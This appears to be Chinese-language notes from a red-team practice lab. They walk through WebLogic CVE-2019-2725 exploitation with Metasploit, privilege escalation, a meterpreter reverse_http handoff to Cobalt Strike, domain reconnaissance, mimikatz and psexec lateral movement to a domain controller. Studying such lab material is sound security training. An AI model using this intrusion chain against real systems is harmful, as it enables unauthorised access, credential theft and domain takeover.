ATK&CK红队评估实战靶场(二)-简记

001# 信息收集

nmap -sS -v 192.168.0.80  //端口探测

open :

80、135、139、445、1433、3389、7001、49152、49153、49154

445  -》smb ms17_010

139-》samba->爆破/未授权访问/远程命令执行

1433-》mssql-》爆破/注入/SA弱口令

7001-》weblogic-》反序列化漏洞

--------

002 ##发现

weblogicScan

python WeblogicScan.py 192.168.0.80 7001

-》SSRF CVE-2019-2725 CVE-2019-2729

-》 http://ip:7001/uddiexplorer/SearchPublicRegistries.jsp

-》search-》post-》burpsuite-》operator

---------

msf-》search CVE-2019-2725->

set rhosts 192.168.0.80

set lhost 192.168.0.129

set target 1

run

->meterpreter>ipconfig

#提权

getuid

getsystem

## 内网渗透

CS->msf

CS:listener->beacon http->8888

msf:>background

use exp/win/local/payload_inject

set payload win/meterpreter/reverse_http

set DisablePayloadHandler true

set lport 8888

set session 2

run

----提权

host->执行->提权

# 信息收集

shell ipconfig /all

》10.0.0.1/24 192.168.0.0 域控ip:10.10.10.10

》delay.com

shell net user /domain

shell net group "domain admins" /domain # 查看域管理员用户

shell net group "domain contrallers" /domain #域控

shell net group "domain computers" /domain #查看狱中其他主机

shell ping PC$

shell ping DC$

shell arp -a

-》de1ay.com

-》DC.de1ay.com

portscan 10.0.0.0/24 1-1024,3389,5000-6000, arp,1024

-》445

psexec 横向移动

10.0.0.80

host-》执行-》Run mimikatz-》listener beacon SMB

10.0.0.10

host->jump->psexec64

username

password

domain

SMB

sessions

->success online!!

对其他机器横向

---

你可能感兴趣的:(网络安全之路,网络安全)